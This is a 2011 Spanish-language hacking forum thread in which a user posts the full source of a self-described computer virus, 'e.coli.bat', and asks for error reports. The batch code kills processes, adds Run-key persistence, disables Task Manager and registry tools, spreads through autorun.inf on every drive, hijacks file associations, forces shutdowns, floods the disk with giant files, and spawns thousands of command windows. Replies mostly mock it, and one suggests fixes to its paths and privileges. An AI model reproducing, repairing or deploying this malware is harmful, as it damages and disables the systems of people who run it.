| 
	
		|  Autor | Tema:  virus informatico llamado e.coli.bat   (Leído 6,295 veces) |  
	| 
			| 
					
						| W4rR3d 
								
								 Desconectado 
								Mensajes: 12
								
								
								
								
								
								   | 
 
sin ven errores en mi codigo por favor notificar su amigo by hackerd W4rR3d ::by hacked W4rR3d::Comunidad Informatica Black Eye Security Team:: Piura - Perùtaskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/Ftskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/Freg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /fREG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /freg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /freg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f:C1if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat& attrib +h +s +r C:\autorun.inf%ecoli% [autorun] >>C:\autorun.inf%ecoli% OPEN=e.coli.bat >>C:\autorun.inf%ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf%ecoli% shell\open\Default=1 >>C:\autorun.inf%ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.infattrib +h +s +r C:\e.coli.batattrib +h +s +r C:\autorun.inf:t1:D1if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat& attrib +h +s +r D:\autorun.inf%ecoli% [autorun] >>D:\autorun.inf%ecoli% OPEN=e.coli.bat >>D:\autorun.inf%ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf%ecoli% shell\open\Default=1 >>D:\autorun.inf%ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.infattrib +h +s +r D:\e.coli.batattrib +h +s +r D:\autorun.inf:t2:E1if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat& attrib +h +s +r E:\autorun.inf%ecoli% [autorun] >>E:\autorun.inf%ecoli% OPEN=e.coli.bat >>E:\autorun.inf%ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf%ecoli% shell\open\Default=1 >>E:\autorun.inf%ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.infattrib +h +s +r E:\e.coli.batattrib +h +s +r E:\autorun.inf:T3:F1if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat& attrib +h +s +r F:\autorun.inf%ecoli% [autorun] >>F:\autorun.inf%ecoli% OPEN=e.coli.bat >>F:\autorun.inf%ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf%ecoli% shell\open\Default=1 >>F:\autorun.inf%ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.infattrib +h +s +r F:\e.coli.batattrib +h +s +r F:\autorun.inf:T4:G1if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat& attrib +h +s +r G:\autorun.inf%ecoli% [autorun] >>G:\autorun.inf%ecoli% OPEN=e.coli.bat >>G:\autorun.inf%ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf%ecoli% shell\open\Default=1 >>G:\autorun.inf%ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.infattrib +h +s +r G:\e.coli.batattrib +h +s +r G:\autorun.inf:open%ecoli%On Error Resume Next >> %HC%open.vbs%ecoli%Set oWMP = CreateObject( "WMPlayer.OCX.7")>> %HC% open.vbs%ecoli%Set colCDROMs = oWMP.cdromCollection>> %HC% open.vbs%ecoli%do>> %HC%open.vbs%ecoli%if colCDROMs.Count > = 1 then>> %HC% open.vbs%ecoli%For i = 0 to colCDROMs.Count - 1>> %HC% open.vbs%ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs%ecoli%Next>> %HC%open.vbs%ecoli%For i = 0 to colCDROMs.Count - 1>> %HC% open.vbs%ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs%ecoli%Next>> %HC%open.vbs%ecoli%End If>> %HC%open.vbs%ecoli%wscript.sleep 5000>> %HC%open.vbs%ecoli%loop >> %HC%open.vbsstart  %HC%open.vbs:cop%HH% "%appdata%\e.coli_a.exe"%HH% "%windir%\e.coli_b.exe"%HH% "%systemroot%\system32\e.coli_c.exe"%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"%HH% "%programfiles%\Winamp\e.coli_f.exe"%HH% "%programfiles%\WinRAR\e.coli_g.exe"%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"%HH% "%programfiles%\shARES\e.coli_i.exe"%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe":reini%ecoli% On Error Resume Next >> %HC%\apgar.vbs%ecoli% set shell = CreateObject( "WScript.Shell") >> %HC% \apgar.vbs%ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbsstart  %HC%\apgar.vbs:warecho msn=msgbox( "Warning Warning Warning",16," no me puedes vencer") >> %HC% \Warning.vbsFor /L %%a IN ( 0,1,1000) DO   start %HC% \Warning.vbs:cmds:wifor %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z) do if exist  "%%A :\" copy  /y %0  "%%A :\INFECTED!!! "for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html) do  assoc .%%E =batfilefor %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe) do copy  /y %0  "%windir% \%%I "attrib +h %windir%for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe) do  tasklist /m |  find /i "%%p " &&  taskkill /f /im %%p .exeecho fsutil file createnew %random% .exe 4000000000>>%windir% \fsutil.exestart %windir%\fsutil.execopy /y %0  "%windir% \jpg.exe"reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f:vesecho 00000000  000      000 0000000000 0000000000 0000000000 00000000000 0000000000 000000>>%userprofile% \Desktop\I.txtecho 00000000  0000     000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000>>%userprofile% \Desktop\N.txtecho   0000    00000    000 000        000        000            000     000        000  0000>>%userprofile% \Desktop\F.txtecho   0000    000000   000 000        000        000            000     000        000   000>>%userprofile% \Desktop\E.txtecho   0000    000 000  000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile% \Desktop\C.txtecho   0000    000  000 000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile% \Desktop\T.txtecho   0000    000   000000 000        000        000            000     000        000   000>>%userprofile% \Desktop\E.txtecho   0000    000    00000 000        000        000            000     000        000  0000>>%userprofile% \Desktop\D.txtecho 00000000  000     0000 000        0000000000 0000000000     000     0000000000 00000000>>%userprofile% \Desktop\! .txtecho 00000000  000      000 000        0000000000 0000000000     000     0000000000 000000>>%userprofile% \Desktop\!! .txt:Full Diskfsutil file createnew INFECTED!!!.exe 40000000000for %%t in (1,1,24) do  at %%t  /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random% .exe 4000000000for /l %%e in ( 0,1,5000) do ( start cmd) 
 
 |  
						| 
								|  |  
								| « Última modificación: 16 Junio 2011, 17:22 pm por W4rR3d » |  En línea | 
 
 |  |  |  | 
			| 
					
						| SuperDraco 
								       
								
								 Desconectado 
								Mensajes: 2.505
								
								 
								Crew Dragon
								
								
								
								
								
								   | 
 
Set ecoli=echo
 
 
 Por dios........................
 
 
 |  
						| 
								|  |  
								|  |  En línea | 
 
 No he vuelto, solo estoy de paso. |  |  |  | 
			| 
					
						| FranciskoAsdf 
								
								 Desconectado 
								Mensajes: 231
								
								 
								Ni bueno, ni malo. Solo nada.
								
								
								
								
								
								     | 
 
Lo mismo de siempre.  |  
						| 
								|  |  
								|  |  En línea | 
 
 Asdf debería ser algún tipo de función. |  |  |  | 
			| 
					
						| bITEBUG 
								
								 Desconectado 
								Mensajes: 26
								
								
								
								
								
								   | 
 
Que maldad por favor! |  
						| 
								|  |  
								|  |  En línea | 
 
 |  |  |  | 
			| 
					
						| MrSilver 
								
								 Desconectado 
								Mensajes: 9
								
								
								
								
								
								   | 
 
Saludos:
 No estoy muy puesto en codigo¿me podeis decir que hace exactamente el virus?
 |  
						| 
								|  |  
								|  |  En línea | 
 
 |  |  |  | 
			| 
					
						| WaAYa HaCK 
								
								 Desconectado 
								Mensajes: 292
								
								 
								Arduino, Android and music
								
								
								
								
								
								   | 
 
Set ecoli=echo
 
 
 Por dios........................
 
 Pero... para qué cojones sirve esto???? Si es más fácil escribir echo  ! Demonios... pero si ahora casi todos los AV detectan los Autorun! |  
						| 
								|  |  
								|  |  En línea | 
 
 La cacatúa yoyó es nueva en el zoo! |  |  |  | 
			| 
					
						| ShotgunLogic 
								
								 Desconectado 
								Mensajes: 233
								
								 
								Claws so razor sharp
								
								
								
								
								
								   | 
 
Esto pasa por meterse tanto pepino...XD |  
						| 
								|  |  
								|  |  En línea | 
 
 The clans are marching against the law, bagpipers play the tunes of war, death or glory I will find, rebellion on my mind. |  |  |  | 
			| 
					
						| Di~OsK | 
 
-10 |  
						| 
								|  |  
								|  |  En línea | 
 
 Necesitas un servidor de TeamSpeak? Un certificado SSL? MANDA MP |  |  |  | 
			| 
					
						| Flamer 
								       
								
								 Desconectado 
								Mensajes: 1.071
								
								 
								crack, crack y mas crack...
								
								
								
								
								
								     | 
 
%HH% "%windir%\e.coli_b.exe"%HH% "%systemroot%\system32\e.coli_c.exe"
 %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
 %HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
 %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
 %HH% "%programfiles%\Winamp\e.coli_f.exe"
 %HH% "%programfiles%\WinRAR\e.coli_g.exe"
 %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
 %HH% "%programfiles%\shARES\e.coli_i.exe"
 %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
 %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
 %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
 %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
 
hola si no tienes privilegios de administrador esto no te funciona ni esto reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /fy pienso que esta linea te marcaria error %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"lo tendrias que poner asi %HH% "%userprofile%\Mis documentos\e.coli_n.exe"y ejecutarlo en la unidad %systemdrive% que porlo general es la unidad c: |  
						| 
								|  |  
								|  |  En línea | 
 
 |  |  |  | 
			| 
					
						| SuperDraco 
								       
								
								 Desconectado 
								Mensajes: 2.505
								
								 
								Crew Dragon
								
								
								
								
								
								   | 
 
no se porque le ayudais, si este tipo nunca corrije nada, antes de pararse a corregir un batch, ya está haciendo otro batch con más errores que el anterior.
 Como ya han dicho, lo mismo de siempre...
 
 Por cierto, la mitad del código se puede reducir a un FOR para buscar unidades.
 
 Saludos
 |  
						| 
								|  |  
								|  |  En línea | 
 
 No he vuelto, solo estoy de paso. |  |  |  |  |  
 
	
 
 
				
					
						| Mensajes similares |  
						|  | Asunto | Iniciado por | Respuestas | Vistas | Último mensaje |  
						|   |   | virus informatico dengue.bat Scripting
 | W4rR3d | 4 | 5,587 |  8 Febrero 2011, 22:32 pm por leogtz
 |  
						|   |   | [BATCH] virus informatico fiebre.exe
							« 1 2 3 » Scripting
 | W4rR3d | 23 | 16,286 |  18 Octubre 2011, 03:17 am por Sorke
 |  
						|   |   | virus informatico msn.exe
							« 1 2 » Scripting
 | W4rR3d | 10 | 8,835 |  21 Febrero 2011, 01:40 am por ace332
 |  
						|   |   | virus informatico taskmgr.bat Scripting
 | W4rR3d | 4 | 5,296 |  26 Marzo 2011, 13:13 pm por FranciskoAsdf
 |  
						|   |   | La Policía desmiente el bulo del paracetamol que tiene un virus llamado Machupo Noticias
 | wolfbcn | 0 | 2,084 |  22 Junio 2017, 21:52 pm por wolfbcn
 |    |